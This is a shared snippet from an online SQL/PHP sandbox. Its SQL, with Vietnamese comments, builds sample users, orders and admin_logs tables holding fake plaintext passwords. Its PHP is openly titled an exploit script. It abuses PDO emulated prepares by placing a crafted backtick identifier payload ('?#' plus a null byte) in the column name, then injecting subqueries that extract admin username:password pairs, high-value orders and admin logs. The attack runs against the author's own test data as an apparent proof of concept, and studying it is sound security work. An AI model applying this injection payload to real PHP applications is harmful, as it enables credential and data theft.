Free Online MySQL 8.0 Playground

SQL code: Upload Copy Format Clear

-- Tạo bảng fruit gốc từ ví dụ CREATE TABLE fruit ( id INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(50), sku VARCHAR(20) ); -- Tạo bảng users chứa thông tin nhạy cảm để exploit CREATE TABLE users ( id INT AUTO_INCREMENT PRIMARY KEY, username VARCHAR(100) UNIQUE, password VARCHAR(255), email VARCHAR(100), role VARCHAR(20) DEFAULT 'user' ); -- Tạo bảng orders với dữ liệu tài chính CREATE TABLE orders ( id INT AUTO_INCREMENT PRIMARY KEY, user_id INT, product_name VARCHAR(200), amount DECIMAL(10,2), status VARCHAR(20) DEFAULT 'pending', created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, FOREIGN KEY (user_id) REFERENCES users(id) ); -- Tạo bảng admin_logs với thông tin hệ thống CREATE TABLE admin_logs ( id INT AUTO_INCREMENT PRIMARY KEY, action VARCHAR(100), user_id INT, timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP, ip_address VARCHAR(45), details TEXT ); -- Insert dữ liệu mẫu vào fruit INSERT INTO fruit (name, sku) VALUES ('apple', 'FRU-APL'), ('banana', 'FRU-BAN'), ('orange', 'FRU-ORG'), ('grape', 'FRU-GRP'); -- Insert dữ liệu nhạy cảm vào users INSERT INTO users (username, password, email, role) VALUES ('admin', 'P@ssw0rd123!', 'admin@company.com', 'admin'), ('john_doe', 'secret123', 'john@company.com', 'user'), ('jane_smith', 'mypassword', 'jane@company.com', 'manager'), ('bob_wilson', 'qwerty456', 'bob@company.com', 'user'); -- Insert dữ liệu orders INSERT INTO orders (user_id, product_name, amount, status) VALUES (1, 'Premium Software License', 9999.99, 'completed'), (2, 'Monthly Subscription', 29.99, 'pending'), (3, 'Enterprise Package', 15000.00, 'completed'), (4, 'Basic Plan', 9.99, 'active'); -- Insert admin logs INSERT INTO admin_logs (action, user_id, ip_address, details) VALUES ('LOGIN', 1, '192.168.1.100', 'Admin login successful'), ('DELETE_USER', 1, '192.168.1.100', 'Deleted inactive user account'), ('BACKUP_DB', 1, '192.168.1.100', 'Database backup completed'), ('CONFIG_CHANGE', 3, '192.168.1.101', 'Updated security settings');

SQL Server:

Stuck with a problem? Got Error? Ask AI support!

SQL Result: ( preserve ) Copy Clear

PHP code: Copy Format Clear

<?php // PHPize.online environment exploit script // MySQL 8.0, PHP 8.x với PDO emulated prepares mặc định bật // 1. Thiết lập PDO $pdo = $GLOBALS['pdo']; // PHPize.online tự cung cấp $pdo kết nối MySQL $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); // 2. Hàm thực thi exploit function runExploit(PDO $pdo, string $colPayload, string $namePayload): void { echo "=== Exploit payload ===\n"; echo "- col payload (hex): " . bin2hex($colPayload) . "\n"; echo "- name payload: " . $namePayload . "\n\n"; // Xây dựng identifier với payload $col = '`' . str_replace('`', '``', $colPayload) . '`'; $sql = "SELECT $col FROM fruit WHERE name = ?"; // Prepare & Execute (cung cấp 2 giá trị để khớp 2 dấu '?') $stmt = $pdo->prepare($sql); $stmt->execute([null, $namePayload]); // Hiển thị kết quả $rows = $stmt->fetchAll(PDO::FETCH_NUM); if (empty($rows)) { echo "No data returned.\n"; } else { foreach ($rows as $r) { echo $r[0] . "\n"; } } echo str_repeat("─", 40) . "\n\n"; } // 3. Exploit các bảng custom trên PHPize.online // A) Trích xuất admin credentials từ bảng users runExploit( $pdo, '?#' . chr(0), "x` FROM (SELECT CONCAT(username,':',password) AS `x` FROM users WHERE role='admin')y;#" ); // B) Trích xuất đơn hàng >1000 từ bảng orders runExploit( $pdo, '?#' . chr(0), "x` FROM (SELECT CONCAT(product_name,' ($',amount,')') AS `x` FROM orders WHERE amount>1000)y;#" ); // C) Trích xuất 5 log hệ thống mới nhất từ bảng admin_logs runExploit( $pdo, '?#' . chr(0), "x` FROM (SELECT CONCAT(action,' @ ',ip_address,' — ',details) AS `x` FROM admin_logs ORDER BY timestamp DESC LIMIT 5)y;#" ); ?>

PHP version:

PHP Result: ( warnings notices ) Copy Clear

PHP versions: PHP 7.4, PHP 8.0, PHP 8.1, PHP 8.2, PHP 8.3, PHP 8.4
RDBMS versions: MySQL 8.0, MySQL 8.0 Sakila (ReadOnly), MySQL 9.3.0, MariaDB 11.4, MariaDB 11.8, MariaDB 10, MariaDB 10 Sakila (ReadOnly), SQLite 3, SQLite 3 Preloaded, PostgreSQL 10 Bookings (ReadOnly), PostgreSQL 13, PostgreSQL 14, PostgreSQL 15, PostgreSQL 16, PostgreSQL 17 + PostGIS, PostgreSQL 17 + PostGIS WorkShop (ReadOnly), MS SQL Server 2017, MS SQL Server 2019, MS SQL Server 2022, MS SQL Server 2022 AdventureWorks (ReadOnly), Firebird 4.0, Firebird 4.0 (Employee), RedDatabase 5.0, Oracle Database 19c (HR), Oracle Database 21c, Oracle Database 23c Free, SOQOL, ClickHouse

PHPize Online / SQLize Online / SQLtest Online

Online Sandbox for SQL and PHP: Write, Run, Test, and Share SQL Queries and PHP Code

Stuck with a problem? Got Error? Ask AI support!

Save Snippet

PHPize Online / SQLize Online / SQLtest Online

Online Sandbox for SQL and PHP: Write, Run, Test, and Share SQL Queries and PHP Code

Stuck with a problem? Got Error? Ask AI support!